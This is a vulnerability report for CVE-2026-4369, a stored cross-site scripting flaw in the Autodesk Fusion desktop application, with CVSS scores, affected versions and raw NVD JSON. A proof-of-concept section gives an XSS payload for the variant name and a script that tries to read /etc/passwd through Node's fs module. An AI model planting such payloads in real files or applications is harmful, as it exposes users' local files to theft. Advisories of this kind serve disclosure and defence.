Security Vulnerability Report
CVE-2026-4369 CVSS 7.1 HIGH

Published: 2026-04-14 15:16:39
Last Modified: 2026-04-22 15:12:45

Description

A maliciously crafted HTML payload in an assembly variant name, when displayed during the delete confirmation dialog and clicked by a user, can trigger a Stored Cross-site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A malicious actor may leverage this vulnerability to read local files or execute arbitrary code in the context of the current process.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:autodesk:fusion:*:*:*:*:*:*:*:* - VULNERABLE
Autodesk Fusion < fixed version (see the official advisory ADSK-SA-2026-0005)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- Malicious HTML payload for Assembly Variant Name -->
<img src=x onerror="alert('CVE-2026-4369 XSS Triggered');">

<!-- Advanced payload attempting to read local files (assuming Electron/Node context) -->
<script>
  // Attempt to read a file if Node integration is enabled
  try {
    const fs = require('fs');
    alert(fs.readFileSync('/etc/passwd').toString());
  } catch (e) {
    console.log('Sandbox escape failed or restricted');
  }
</script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4369", "sourceIdentifier": "[email protected]", "published": "2026-04-14T15:16:38.943", "lastModified": "2026-04-22T15:12:45.310", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A maliciously crafted HTML payload in an assembly variant name, when displayed during the delete confirmation dialog and clicked by a user, can trigger a Stored Cross-site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A malicious actor may leverage this vulnerability to read local files or execute arbitrary code in the context of the current process."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:autodesk:fusion:*:*:*:*:*:*:*:*", "versionEndExcluding": "2702.1.47", "matchCriteriaId": "04D4CA6B-72DC-47B4-8CD4-9702E5055DF0"}]}]}], "references": [{"url": "https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.dmg", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.exe", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0005", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}